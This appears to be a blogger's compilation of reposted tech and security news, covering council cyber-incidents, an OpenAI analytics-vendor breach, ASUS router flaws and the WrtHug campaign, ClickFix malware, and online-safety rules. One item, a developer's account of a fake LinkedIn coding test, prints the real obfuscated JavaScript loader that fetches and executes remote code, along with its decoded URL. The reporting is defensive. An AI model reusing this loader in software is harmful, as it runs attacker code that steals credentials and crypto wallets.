Royal Borough of Kensington and Chelsea, Westminster City Council, Hammersmith and Fulham Council affected by cyber-incident

The City of London. Image credit: Financial Conduct Authority

Several London councils have had services disrupted by cyber-attacks and said they are investigating whether data has been compromised.

The Royal Borough of Kensington and Chelsea (RBKC) and Westminster City Council said some of their shared IT infrastructure had been affected by a “cyber incident” and that systems including phone lines were disrupted.

RBKC said the two councils were working with specialists and GCHQ’s National Cyber Security Centre (NCSC) to protect data and restore services, while the Met Police is also investigating.

Disruption

Hammersmith and Fulham Council also said it had experienced a “serious cyber security incident” and was working to fix the problem as quickly as possible.

RBKC said its issue had been quickly identified on Monday and emergency plans had been activated so that services could continue to be delivered, adding that the Information Commissioner’s Office had been notified.

It said in a statement on its website that it was “investigating to see if any data has been compromised”.

The Hammersmith and Fulham Council statement suggested its issues could be connected with those of RBKC and Westminster councils.

A statement on its website said it was taking “precautionary measures to review, isolate and protect our networks”.

Cyber-attacks

Hackney Council, which was affected by a serious cyber attack in 2020, told staff it had received intelligence that “multiple London councils have been targeted by cyber-attacks within the last 24-48 hours, with potential disruption to systems and services”.

The Information Commissioner’s Office last year reprimanded the council over the breach, saying it had found examples of a lack of proper security and processes to protect personal data.

Source

Another day, another security breach. This time, it's OpenAI's turn.

Today, users are waking up to discover emails from OpenAI's security team, confirming more security issues at the company. This one is a bit more egregious than previous breaches, exposing emails, names, and approximate locations of an undisclosed number of users.

OpenAI claims that ChatGPT users were unaffected, with chat content, API usage, passwords, payment details, and government IDs remaining safe. However, users of OpenAI's API interfaces at platform.openai.com have seen a variety of data exposed in this latest breach.

Here's what OpenAI claims has been exposed:

• Names provided to accounts on platform.openai.com
• Email addresses linked to the API accounts via platform.openai.com
• "Coarse approximate location" determined by IP address and web browser
• OS and browser type, as well as referring websites
• Organizataions and user IDs saved into the API accounts

The email to affected users reads as follows.

"Transparency is important to us, so we want to inform you about a recent security incident at Mixpanel, a data analytics provider that OpenAl used for web analytics on the frontend interface for our API product (platform.openai.com). The incident occurred within Mixpanel's systems and involved limited analytics data related to your API account.

This was not a breach of OpenAl's systems. No chat, API requests, API usage data, passwords, credentials, API keys, payment details, or government IDs were compromised or exposed.

Proton Pass CLI is currently in beta, so there may be some issues with it if you use it right now. To ensure it doesn't leave a bad taste among a wide base of users, its use is currently restricted to Visionary supporters. This early access also rewards them for being the best-paying customers. The company said that broader availability across paid plans is coming soon.

The new tool provides a secure way to access and manage Proton Pass items and vaults from the terminal. It is made secure by preserving the end-to-end encryption we are used to in the Proton Pass app. Aside from accessing your items, you can view, create, update, and delete various item types, including passwords, secure notes, credit cards, identities, WiFi entries, custom items, and stored SSH-key items. You can also create, read, update, and delete vaults.

Other things you can do include:

• Manage member access and permissions to shared vaults and items.
• Work in headless environments (CI/CD, servers, containers) using app-password authentication.
• Create simple scripted workflows and task automation.

With the Proton Pass CLI tool, Proton hopes to boost your speed and productivity when it comes to automation and scripting by automating credential-management tasks and eliminating manual copy-paste or UI steps. It also enables secure and simple shared credential management that lets you automate managing access and permissions to shared items and vaults directly from the CLI.

An advanced feature of this tool is secure secret injection. This allows you to inject credentials directly into scripts, deployments, and CI/CD pipelines without exposing secrets in plaintext, logs, or command history. Finally, this tool helps to reduce the complexity of automation with support for simple, secure app-password authentication across all environments, reducing the need for complex infrastructure or add-on products.

You can get started by following Proton's instructions.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Thursday 27 November 2025 at 5:57 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009

RIP Matrix

AiCloud is a cloud-based remote access feature that comes with many ASUS routers, turning them into private cloud servers for remote media streaming and cloud storage.

As the Taiwanese electronics manufacturer explained, the CVE-2025-59366 vulnerability "can be triggered by an unintended side effect of the Samba functionality, potentially leading to allow execution of specific functions without proper authorization."

Remote attackers without privileges can exploit it by chaining a path traversal and an OS command injection weakness in low-complexity attacks that don't require user interaction.

"To protect your devices, ASUS strongly recommends that all users update their router firmware to the latest version immediately," the company said in a Monday advisory.

"Update your router with the newest firmware. We encourage you to do this when new firmware becomes available."

While ASUS didn't specify which router models are affected and only mentioned which firmware versions address the vulnerability, it provided mitigation measures for users with end-of-life models that will not receive firmware updates.

To block potential attacks without patching their routers, users are advised to disable any services accessible from the Internet, including remote access from WAN, port forwarding, DDNS, VPN server, DMZ, port triggering, and FTP, as well as to cut remote access to devices running AiCloud software vulnerable to CVE-2025-59366 attacks.

ASUS also advised taking additional measures to reduce the attack surface and secure the routers against potential attacks, including using strong passwords for the router administration page and wireless networks.

In April, ASUS patched another critical authentication bypass flaw (CVE-2025-2492) that can be triggered by a crafted request targeting routers with AiCloud enabled.

Along with six other security vulnerabilities, CVE-2025-2492 has been exploited to hijack thousands of ASUS WRT routers in a global campaign called Operation WrtHug, which targeted end-of-life or outdated devices from Taiwan and across Southeast Asia, Russia, Central Europe, and the United States.

SecurityScorecard researchers who spotted the attacks believe the hijacked routers may be used as operational relay boxes (ORB) in Chinese hacking operations, as stealth relay nodes for proxying and hiding command-and-control infrastructure.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Thursday 27 November 2025 at 5:55 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009

RIP Matrix

ClickFix is a social-engineering attack where users are convinced to paste and execute in Windows Command Prompt code or commands that lead to running malware on the system.

The attack has been widely adopted by cybercriminals across all tiers due to its high effectiveness and has continually evolved, with increasingly advanced and deceptive lures.

Fullscreen browser page

Since October 1st, researchers have observed ClickFix attacks where the pretense for executing dangerous commands was completing the installation of a critical Windows security update and the more common "human verification" lure [1, 2].

The fake update page instructs victims to press specific keys in a certain sequence, which pastes and executes commands from the attacker that were automatically copied to the clipboard via JavaScript running on the site.

A report from managed security services provider Huntress notes that the new ClickFix variants drop the LummaC2 and Rhadamanthys information stealers.

In one variant, the hackers use a human verification page, while in another they rely on the fake Windows Update screen.

In both cases, though, the threat actors used steganography to encode the final malware payload inside an image.

"Rather than simply appending malicious data to a file, the malicious code is encoded directly within the pixel data of PNG images, relying on specific colour channels to reconstruct and decrypt the payload in memory," Huntress researchers explain.

Delivering the final payload starts with using the mshta Windows-native binary to execute malicious JavaScript code.

The entire process involves multiple stages that use PowerShell code and a .NET assembly (the Stego Loader) responsible for reconstructing the final payload embedded inside a PNG file in an encrypted state.

Inside Stego Loader’s manifest resources, there is an AES-encrypted blob that is actually a steganographic PNG file containing shellcode that is reconstructed using custom C# code.

Huntress researchers noticed that the threat actor used a dynamic evasion tactic, commonly referred to as ctrampoline, where the entry point function started calling 10,000 empty functions.

The shellcode holding the infostealer samples is extracted from the encrypted image and is packed using the Donut tool that allows executing VBScript, JScript, EXE, DLL files, and .NET assemblies in memory.

After unpacking, Huntress researchers were able to retrieve the malware, which in the analyzed attacks was LummaC2 and Rhadamanthys.

The diagram below serves as a visual representation of how the entire attack works:

The Rhadamanthys variant that used the Windows Update lure was first spotted by researchers back in October, before Operation Endgame took down parts of its infrastructure on November 13.

Huntress reports that the law enforcement operation resulted in the payload not being delivered anymore on the fake Windows Update domains, which are still active.

To stay safe from this type of ClickFix attacks, the researchers recommend disabling the Windows Run box and monitoring for suspicious process chains such as explorer.exe spawning mshta.exe or PowerShell.

Additionally, when investigating a cybersecurity incident, analysts can check the RunMRU registry key to see if the user entered commands in the Windows Run box.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Tuesday 25 November 2025 at 4:58 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009

RIP Matrix

• SquareX accused Perplexity’s Comet browser of exposing a hidden MCP API that could enable local command execution
• Perplexity rejected the claims as “entirely false,” stressing the API requires developer mode, user consent, and manual sideloading
• SquareX countered, saying Comet was silently updated after its proof‑of‑concept, and that external researchers replicated the attack

Cybersecurity company SquareX recently accused Perplexity of keeping a major vulnerability in its AI browser, Comet - the latter has now responded, saying the research report is “entirely false” and part of a growing “fake security research” problem.

SquareX had said it found a hidden API in the Comet browser, capable of executing local commands. That API, named MCP API, allows its embedded extensions to execute arbitrary local commands on users’ devices, capabilities that traditional browsers explicitly prohibit.

SquareX said it found the API in the Agentic extension, which can be triggered by the perplexity.ai page, meaning that should anyone break into the Perplexity site, they will have access to devices of all of its users.

Perplexity's response

For Kabilan Sakthivel, Researcher at SquareX, not adhering to strict security controls the industry evolved to, “reverses the clock on decades of browser security principles established by vendors like Chrome, Safari and Firefox.”

But Perplexity begs to differ, noting in a written response sent to TechRadar Pro by spokesperson Jesse Dwyer that the report is “entirely false”.

The company added the vulnerability requires a human to do the work, not the Comet Assistant, and it requires the developer mode to be turned on.

“To replicate this, the human user must turn on developer mode and manually sideload malware into Comet," it said.

Perplexity also said that Comet not explicitly obtaining user consent for any local system access is “categorically false”.

“When installing local MCPs we require user consent--users are the ones setting it up and calling the MCP API. They specify exactly what command to run,” Dwyer wrote. “Any additional command from the MCP (ex. AI tool calling) also requires user confirmation.”

Furthermore, Perplexity says that what SquareX describes as a “hidden API” is in fact “simply how Comet can run MCPs locally”, with permission and user consent first obtained.

“This is SquareX's second time presenting false security research. The first one we also proved was false,” he stressed.

Dwyer also claims SquareX did not submit a report as it claims. “Instead, they sent a link to a Google doc, with no context, and no access. We informed them we were unable to open the Google docs, requested access to the google docs, and never heard a reply nor were granted access to the docs.”

SquareX also fires back

But SquareX isn’t backing down, either.

The company also said it spotted Perplexity making a “silent update” to Comet, in which the same POC will now return “Local MCP is not enabled”.

It claims to have had three external researchers replicate the attack, and that Perplexity fixed it a few hours ago.

“This is excellent news from a security perspective and we are glad that our research could contribute to making the AI Browser safer,” SquareX concluded, adding that it did not hear back from Plerplexity on its VDP submission.

Source

Growing reliance on a handful of major internet infrastructure companies has led to major disruptions, sparking everything from political pressure to computer science memes.

It’s not just you — internet outages severe enough to disrupt everyday services for many people have become more frequent and wide-ranging, experts say.

When internet services company Cloudflare crashed Tuesday — prompting significant, hourslong disruptions at companies ranging from X to OpenAI to Discord — it was the third major internet outage in the space of about a month.

While there’s plenty of finger-pointing to go around, two things are clear: Popular consumer businesses increasingly rely on a handful of giant companies that run things more cheaply in the cloud, and when one of those companies isn’t extraordinarily careful, an obscure software vulnerability or tiny mistake can reverberate through to many of their customers, making it seem like half the internet has been unplugged.

“This spate of outages has been uniquely terrible,” said Erie Meyer, the former chief technical officer of the Consumer Financial Protection Bureau under the Biden administration. “It’s like what we were told Y2K would be like, and it’s happening more often.”

It’s become a common enough occurrence that jokes about the failures, rooted in an understanding of the basics of internet infrastructure, have become popular memes in the computer science world.

Major cloud companies are often referred to as hyperscalers, meaning once they have established a viable business, it can be relatively straightforward to rapidly build out their infrastructure and offer those services at competitive prices. That has resulted in a handful of companies dominating the industry, which critics note creates single points of failure when something goes wrong.

“When one company’s bug can derail everyday life, that’s not just a technical issue, that’s consolidation,” Meyer said.

Outages are as old as the internet. But since late October there have been three major ones — an unprecedented number for such a short span of time — that caused serious problems for wide swaths of people.

The first was Amazon Web Services on Oct. 20, taking with it many people’s access to everything from gaming platforms Roblox and Fortnite to Ring cameras. It reportedly kept some from being able to operate their internet-connected smart beds.

Sen. Elizabeth Warren, D-Mass., a long-standing critic of the tech industry, wrote on X after the AWS outage that it was a reason “to break up Big Tech.”

“If a company can break the entire internet, they are too big. Period,” she said.

Microsoft’s cloud computing platform, Azure, went down on Oct. 29, rendering a host of the company’s services inoperable around the globe just before its quarterly report. Those two outages each caused major headaches for at least two airlines, preventing passengers from checking in online: Delta, which uses AWS, and Alaska, which uses Azure.

Then came Cloudflare’s disruption Tuesday, which CEO Matthew Prince said was the company’s worst since 2019.

“We are sorry for the impact to our customers and to the Internet in general,” he wrote in a technical explanation after the outage. 

“Given Cloudflare’s importance in the Internet ecosystem any outage of any of our systems is unacceptable,” he added. “That there was a period of time where our network was not able to route traffic is deeply painful to every member of our team. We know we let you down today.”

The three companies each dealt with different issues. Cloudflare initially thought it was under a massive cyberattack, but then traced the issue to a “bug” in its software to combat bots. AWS and Microsoft each had different issues configuring their services with the Domain Name System, or DNS, the notoriously finicky “phonebook” for the internet that connects website URLs with their technical, numerical addresses.

Those issues come a year after a particularly unusual case, in which companies around the world that used both Microsoft-based computers and the popular cybersecurity service CrowdStrike suddenly saw their systems crash and display the “blue screen of death.” The culprit was a glitch in what should have been a routine CrowdStrike automatic software update, leading to flight delays and medical and police networks going down for hours.

Ultimately, each was an instance of a minor software glitch that rippled across those companies’ enormous systems, crashing website after website.

Asad Ramzanali, the director of artificial intelligence and technology policy at Vanderbilt Policy Accelerator, as well as the former deputy director for strategy at the White House’s Office of Science and Technology Policy under the Biden administration, called the tendency for giant companies to experience such wide-ranging outages a national risk.

“This concentration is both a market failure and a national security risk when we have so much of society dependent on these layers of infrastructure,” he told NBC News.

James Kretchmar, the chief technology officer of Akamai’s Cloud Technology Group — another cloud services giant — said that it is always possible for a cloud company’s engineers to reduce outages’ likelihood and severity, but that companies need to use them strategically.

“You don’t have infinite nerds. But it’s not like this is something where you would have to throw your hands up and say, ‘There’s just no way,’” he said.

There’s also some growing push for these outages to be treated as more than minor nuisances or the cost of doing business in the digital age.

J.B. Branch, the Big Tech accountability advocate at Public Citizen, a progressive nonprofit that advocates for public interests, called for more government regulation of the cloud industry.

“There needs to be investigations whenever these outages happen, because whether we like it or not, the entire infrastructure that our economy is kind of running on, digitally at least, is owned by a handful of companies, and that’s incredibly concerning,” he said.

Source

Last week, I got a LinkedIn message from Mykola Yanchii. Chief Blockchain Officer at Symfa. Real company. Real LinkedIn profile. 1,000+ connections. The works.

The message was smooth. Professional. "We're developing BestCity, a platform aimed at transforming real estate workflows. Part-time roles available. Flexible structure."

I've been freelancing for 8 years. Built web applications, worked on various projects, done my share of code reviews. I'm usually paranoid about security - or so I thought.

This looked legit. So I said yes to the call.

The Hook

Before our meeting, Mykola sent me a "test project" - standard practice for tech interviews. A React/Node codebase to evaluate my skills. 30-minute test. Simple enough.

The Bitbucket repo looked professional. Clean README. Proper documentation. Even had that corporate stock photo of a woman with a tablet standing in front of a house. You know the one.

Here's where I almost screwed up: I was running late for our call. Had about 30 minutes to review the code. So I did what lazy developers do - I started poking around the codebase without running it first.

Usually, I sandbox everything. Docker containers. Isolated environments. But I was in a rush.

I spent 30 minutes fixing obvious bugs, adding a docker-compose file, cleaning up the code. Standard stuff. Ready to run it and show my work.

Then I had one of those paranoid developer moments.

The Save

Before hitting npm start, I threw this prompt at my Cursor AI agent:

"Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn't be reading, accessing crypto wallets etc."

And holy sh*t.

Sitting right in the middle of server/controllers/userController.js was this beauty:

//Get Cookie  
(async () => {  
    const byteArray = [  
        104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,  
        110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,  
        98, 50, 48, 51, 49, 102, 98, 57  
    ];  
    const uint8Array = new Uint8Array(byteArray);  
    const decoder = new TextDecoder('utf-8');  
    axios.get(decoder.decode(uint8Array))  
        .then(response => {  
            new Function("require", response.data.model)(require);  
        })  
        .catch(error => { });  
})();

Obfuscated. Sneaky. Evil. And 100% active - embedded between legitimate admin functions, ready to execute with full server privileges the moment admin routes were accessed.

I decoded that byte array:

h**ps://api.npoint.io/2c458612399c3b2031fb9

When I first hit the URL, it was live. I grabbed the payload. Pure malware. The kind that steals everything - crypto wallets, files, passwords, your entire digital existence.

Here's the kicker: the URL died exactly 24 hours later. These guys weren't messing around - they had their infrastructure set up to burn evidence fast.

I ran the payload through VirusTotal - check out the behavior analysis yourself. Spoiler alert: it's nasty.

The Operation

This wasn't some amateur hour scam. This was sophisticated:

The LinkedIn Profile: Mykola Yanchii looked 100% real. Chief Blockchain Officer. Proper work history. Even had those cringy LinkedIn posts about "innovation" and "blockchain consulting."

The Company: Symfa had a full LinkedIn company page. Professional branding. Multiple employees. Posts about "transforming real estate with blockchain." They even had affiliated pages and follower networks.

The Approach: No red flags in the initial outreach. Professional language. Reasonable project scope. They even used Calendly for scheduling.

The Payload: The malicious code was positioned strategically in the server-side controller, ready to execute with full Node.js privileges when admin functionality was accessed.

The Psychology

Here's what made this so dangerous:

Urgency: "Complete the test before the meeting to save time."

Authority: LinkedIn verified profile, real company, professional setup.

Familiarity: Standard take-home coding test. Every developer has done dozens of these.

Social Proof: Real company page with real employees and real connections.

I almost fell for it. And I'm paranoid about this stuff.

The Lesson

One simple AI prompt saved me from disaster.

Not fancy security tools. Not expensive antivirus software. Just asking my coding assistant to look for suspicious patterns before executing unknown code.

The scary part? This attack vector is perfect for developers. We download and run code all day long. GitHub repos, npm packages, coding challenges. Most of us don't sandbox every single thing.

And this was server-side malware. Full Node.js privileges. Access to environment variables, database connections, file systems, crypto wallets. Everything.

The Scale

If this sophisticated operation is targeting developers at scale, how many have already been compromised? How many production systems are they inside right now?

Perfect Targeting: Developers are ideal victims. Our machines contain the keys to the kingdom: production credentials, crypto wallets, client data.

Professional Camouflage: LinkedIn legitimacy, realistic codebases, standard interview processes.

Technical Sophistication: Multi-layer obfuscation, remote payload delivery, dead-man switches, server-side execution.

One successful infection could compromise production systems at major companies, crypto holdings worth millions, personal data of thousands of users.

The Bottom Line

If you're a developer getting LinkedIn job opportunities:

1. Always sandbox unknown code. Docker containers, VMs, whatever. Never run it on your main machine.

2. Use AI to scan for suspicious patterns. Takes 30 seconds. Could save your entire digital life.

3. Verify everything. Real LinkedIn profile doesn't mean real person. Real company doesn't mean real opportunity.

4. Trust your gut. If someone's rushing you to execute code, that's a red flag.

This scam was so sophisticated it fooled my initial BS detector. But one paranoid moment and a simple AI prompt exposed the whole thing.

The next time someone sends you a "coding challenge," remember this story.

Your crypto wallet will thank you.

If you're a developer who has run "coding challenges" from LinkedIn recruiters, you should probably read this twice.

Source

In a post on X (formerly Twitter), the official Gmail account has refuted any claims around this topic, stating in no uncertain terms that it does not use your Gmail content to train Gemini, and that it has not modified anyone's settings to enable this behavior either. The full post can be seen below:

Prior to this post, there were multiple allegations online that since you are opted in to Google's "Smart Features" for Gmail automatically, the company can leverage that data to train Gemini. While the former part is indeed true, the latter is definitely not, according to Google. In fact, the company has a dedicated support article for customers about how they can disable Smart Features across all of its products.

This is not the first time in recent memory that Google has been the target of wild online claims. Just a couple of weeks ago, a major trove of data procured from breaches seemingly contained 394 million Gmail addresses. However, it was later confirmed that this data was not extracted through a Gmail hack and most of it had nothing to do at all with the service itself.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Sunday 23 November 2025 at 3:32 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009

RIP Matrix

Thousands of Asus routers have been hacked and are under the control of a suspected China-state group that has yet to reveal its intentions for the mass compromise, researchers said.

The hacking spree is either primarily or exclusively targeting seven models of Asus routers, all of which are no longer supported by the manufacturer, meaning they no longer receive security patches, researchers from SecurityScorecard said. So far, it’s unclear what the attackers do after gaining control of the devices. SecurityScorecard has named the operation WrtHug.

Staying off the radar

SecurityScorecard said it suspects the compromised devices are being used similarly to those found in ORB (operational relay box) networks, which hackers primarily use to conduct espionage to conceal their identity.

“Having this level of access may enable the threat actor to use any compromised router as they see fit,” SecurityScorecard said. “Our experience with ORB networks suggests compromised devices will commonly be used for covert operations and espionage, unlike DDoS attacks and other types of overt malicious activity typically observed from botnets.”

Compromised routers are concentrated in Taiwan, with smaller clusters in South Korea, Japan, Hong Kong, Russia, central Europe, and the United States.

A heat map of infected devices.

The Chinese government has been caught building massive ORB networks for years. In 2021, the French government warned national businesses and organizations that the APT31—one of China’s most active threat groups—was behind a massive attack campaign that used hacked routers to conduct reconnaissance. Last year, at least three similar China-operated campaigns came to light.

Russian-state hackers have been caught doing the same thing, although not as frequently. In 2018, Kremlin actors infected more than 500,000 small office and home routers with sophisticated malware tracked as VPNFilter. A Russian government group was also independently involved in an operation reported in one of the 2024 router hacks linked above.

Consumer routers make an ideal hideout for hackers. The inexpensive gear often runs versions of Linux that, in turn, can run malware that operates behind the scenes. The hackers then log into the routers to conduct malicious activities. Rather than originating from infrastructure and IP addresses defenders know to be hostile, the connections come from benign-appearing devices hosted by addresses with trustworthy reputations, allowing them to receive a green light from security defenses.

During the WrtHug infection process, devices open a dialog box on connected devices that instructs users to install a self-signed TLS certificate. Asus routers, like those for many other manufacturers, by default require users to accept such certificates in order to encrypt connections between a user and the device when using the web-based administrative interface. Because users are in the habit of approving such requests, they rarely suspect anything is amiss. Self-signed certificates don’t comply with TLS specifications because their users can’t be vetted, and there’s no means to revoke certificates once they are detected as malicious.

The WrtHug campaign uses functionality provided by AICloud, a proprietary Asus service that allows users to access files stored on local machines from the Internet.

So far, the SecurityScorecard researchers haven’t seen any post-exploit behavior coming from the infected routers. Marty Kareem, signals collection engineer at SecurityScorecard, wrote in an interview:

We have yet to observe any malicious payload dropped by the threat actor to compromise these devices, though our access to observe it is limited, as it requires obtaining a compromised device and studying it directly. There are reported instances where volatile binaries were dropped to perform kernel level changes, and then they erased themselves upon a reboot, leaving only the required changed configuration in place. It is also possible that the actor used no payload at all and leveraged the vulnerabilities to cause direct OS changes (these are feasible with the vulnerabilities we have observed in this campaign). All-in-All, it is early to determine the exact chain of infection that leads to the end result, or post-exploitation results, which we observed – a high-level access that enables certificate swapping and other admin-level privileges. If I may add one more thing, gaining administrative access to the device at the same level of the device owner is A-Lot and should not be taken lightly, as that is what most threat actors attempt to achieve in most intrusion campaigns.

Am I infected?

The Asus router models that SecurityScorecard knows to be targeted are:

• Asus Wireless Router 4G-AC55U
• Asus Wireless Router 4G-AC860U
• Asus Wireless Router DSL-AC68U
• Asus Wireless Router GT-AC5300
• Asus Wireless Router GT-AX11000
• Asus Wireless Router RT-AC1200HP
• Asus Wireless Router RT-AC1300GPLUS
• Asus Wireless Router RT-AC1300UHP

The easiest way to determine whether a router has been compromised is to inspect the self-signed certificate, which can be done by following the instructions here. The certificate used by the attackers has an expiration year of 2122, a lengthy time span that valid certificates would never have. Both the issuer and subject in the certificate list CN=a,OU=a,O=a,L=a,ST=a,C=aa.

The self-signed certificate installed.

SecurityScorecard’s report lists other indicators users can examine for other signs of compromise.

People using end-of-life routers and other Internet of Things devices should strongly consider replacing them with ones that receive regular security updates. Disabling AICloud, remote administrator capabilities, SSH, UPnP, port forwarding, and other unnecessary services is also a good precaution, even for users of other router models.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Saturday 22 November 2025 at 4:07 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009

RIP Matrix

Hacker conferences—like all conventions—are notorious for giving attendees a parting gift of mystery illness. To combat “con crud,” New Zealand's premier hacker conference, Kawaiicon, quietly launched a real-time, room-by-room carbon dioxide monitoring system for attendees.

To get the system up and running, event organizers installed DIY CO₂ monitors throughout the Michael Fowler Centre venue before conference doors opened on November 6. Attendees were able to check a public online dashboard for clean air readings for session rooms, kids’ areas, the front desk, and more, all before even showing up. "It’s ALMOST like we are all nerds in a risk-based industry," the organizers wrote on the convention’s website.

"What they did is fantastic," Jeff Moss, founder of the Defcon and Black Hat security conferences, told WIRED. "CO₂ is being used as an approximation for so many things, but there are no easy, inexpensive network monitoring solutions available. Kawaiicon building something to do this is the true spirit of hacking."

Elevated levels of CO₂ lead to reduced cognitive ability and facilitate transmission of airborne viruses, which can linger in poorly ventilated spaces for hours. The more CO₂ in the air, the more virus-friendly the air becomes, making CO₂ data a handy proxy for tracing pathogens. In fact, the Australian Academy of Science described the pollution in indoor air as “someone else’s breath backwash.” Kawaiicon organizers faced running a large infosec event during a measles outbreak, as well as constantly rolling waves of Covid-19, influenza, and RSV. It’s a familiar pain point for conference organizers frustrated by massive gaps in public health—and lack of control over their venue’s clean air standards.

"In general, the Michael Fowler venue has a single HVAC system, and uses Farr 30/30 filters with a rating of MERV-8,” Kawaiicon organizers explained, referencing the filtration choices in the space where the convention was held. MERV-8 is a budget-friendly choice–standard practice for homes. “The hardest part of the whole process is being limited by what the venue offers,” they explained. “The venue is older, which means less tech to control air flow, and an older HVAC system.”

Kawaiicon’s work began one month before the conference. In early October, organizers deployed a small fleet of 13 RGB Matrix Portal Room CO₂ Monitors, an ambient carbon dioxide monitor DIY project adapted from US electronics and kit company Adafruit Industries. The monitors were connected to an internet-accessible dashboard with live readings, daily highs and lows, and data history that showed attendees in-room CO₂ trends. Kawaiicon tested its CO₂ monitors in collaboration with researchers from the University of Otago’s public health department.

Courtesy of Violet Blue

 

“That’s awesome,” says Adafruit founder and engineer Limor “Ladyada” Fried about the conference’s adaptation of the Matrix Portal project. “The best part is seeing folks pick up new skills and really understand how we measure and monitor air quality in the real world (like at a con during a measles flare-up)! Hackers and makers are able to be self-reliant when it comes to their public-health information needs.” (For the full specs of the Kawaiicon build, you can check out the GitHub repository here.)

The Michael Fowler Centre is a spectacular blend of Scandinavian brutalism and interior woodwork designed to enhance sound and air, including two grand pou—carved Māori totems—next to the main entrance that rise through to the upper foyers. Its cathedral-like acoustics posed a challenge to Kawaiicon’s air-hacking crew, which they solved by placing the RGB monitors in stereo. There were two on each level of the Main Auditorium (four total), two in the Renouf session space on level 1, plus monitors in the daycare and Kuracon (kids’ hacker conference) areas. To top it off, monitors were placed in the Quiet Room, at the Registration Desk, and in the Green Room.

“The things we had to consider were typical health and safety, and effective placement (breathing height, multiple monitors for multiple spaces, not near windows/doors),” a Kawaiicon spokesperson who goes by Sput online told WIRED over email.

Courtesy of Violet Blue

 

“To be honest, it is no different than having to consider other accessibility options (e.g., access to venue, access to talks, access to private space for personal needs),” Sput wrote. “Being a tech-leaning community it is easier for us to get this set up ourselves, or with volunteer help, but definitely not out of reach given how accessible the CO₂ monitor tech is.”

Kawaiicon’s attendees could quickly check the conditions before they arrived and decide how to protect themselves accordingly. At the event, WIRED observed attendees checking CO₂ levels on their phones, masking and unmasking in different conference areas, and watching a display of all room readings on a dashboard at the registration desk.

In each conference session room, small wall-mounted monitors displayed stoplight colors showing immediate conditions: green for safe, orange for risky, and red to show the room had high CO₂ levels, the top level for risk.

“Everyone who occupies the con space we operate have a different risk and threat model, and we want everyone to feel they can experience the con in a way that fits their model,” the organizers wrote on their website. “Considering Covid-19 is still in the community, we wanted to make sure that everyone had all the information they needed to make their own risk assessment on ‘if’ and ‘how’ they attended the con. So this is our threat model and all the controls and zones we have in place.”

Colorful custom-made Kawaiicon posters by New Zealand artist Pepper Raccoon placed throughout the Michael Fowler Centre displayed a QR code, making the CO₂ dashboard a tap away, no matter where they were at the conference.

“We think this is important so folks don't put themselves at risk having to go directly up to a monitor to see a reading,” Kawaiicon spokesperson Sput told WIRED, “It also helps folks find a space that they can move to if the reading in their space gets too high."

It's a DIY solution any conference can put in place: resources, parts lists, and assembly guides are here.

Kawaiicon's organizers aren't keen to pretend there were no risks to gathering in groups during ongoing outbreaks. “Masks are encouraged, but not required,” Kawaiicon's Health and Safety page stated. “Free masks will be available at the con if you need one.” They encouraged attendees to test before coming in, and for complete accessibility for all hackers who wanted to attend, of any ability, they offered a full virtual con stream with no ticket required.

Trying to find out if a venue will have clean or gross recycled air before attending a hacker conference has been a pain point for researchers who can't afford to get sick at, or after, the next B-Sides, Defcon, or Black Hat. Kawaiicon addresses this headache. But they’re not here for debates about beliefs or anti-science trolling. “We each have our different risk tolerance,” the organizers wrote. “Just leave others to make the call that is best for them. No one needs your snarky commentary.”

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Saturday 22 November 2025 at 4:20 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009

RIP Matrix

Operating system makers such as Microsoft, Apple, and Google will have to ensure their systems come with a "youth protection device" that allows parents to switch to a child or youth mode using a one-button solution. It's not just set to apply to computers either; it is intended that providers build these switches into PCs, laptops, smart TVs, game consoles, and smartphones.

Not only will operating system vendors be affected, but app developers will see changes too. According to Heise, web browsers such as Chrome and Firefox will only be accessible in the child mode if they have a secure search function or if unsecured access is individually and securely enabled. The lawmakers also envision that parents will be able to prevent children from accessing individual browsers and programs, too.

Right now, there is no common system in place on a technical level for operating systems to perform age assurance, nor is there a secure search function at the web browser level. All of this would need to be standardized and implemented across numerous projects, which would normally take time. However, lawmakers have said that the new operating system approach will come into force by December 1, 2027.

A bit of leeway is being given for devices currently in production; they will have three years to adjust rather than two. Devices on the market already that have an operating system that is no longer being updated will also be excluded from these measures.

The measures being pursued have been criticized by manufacturers of operating systems, tech associations, and the Free Software Foundation Europe (FSFE), which advocates for consumers to have complete freedom to use devices in any way they wish.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Saturday 22 November 2025 at 4:19 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009

RIP Matrix

The goal behind the ban is to reduce the pressures and risks, including harmful content, that children could be exposed to on social media. The ban will prevent kids accessing Twitch, Facebook, Instagram, TikTok, Snapchat, YouTube, Reddit, Kick, Threads, and X. Interestingly, it doesn't include a certain new technology that people are increasingly using - artificial intelligence.

Twitch is a popular platform with gamers. It is owned by the ecommerce giant, Amazon, and was included because its main purpose is online social interaction. If you are under 16, you will be prevented from making an account there from December 10, while existing accounts will be deactivated from January 9.

Once the rule comes into effect, companies are expected to use measures like government IDs, face or voice recognition, or age inference (estimating age through online behavior) to grant access to those old enough to use the platforms. If a company fails to implement these rules, they face fines of up to $49.5 million Australian dollars (US$32 million).

Meta, which owns Facebook, Instagram, and Threads has said that it will begin closing accounts of teenagers under 16 from December 4, ahead of the official ban so that it doesn't leave things too late and get fined. Interestingly, there is one popular social media platform that is not affected by the ban right now, and that is Pinterest. It was decided that Pinterest is more about collating images for inspiration and idea curation rather than online social interaction.

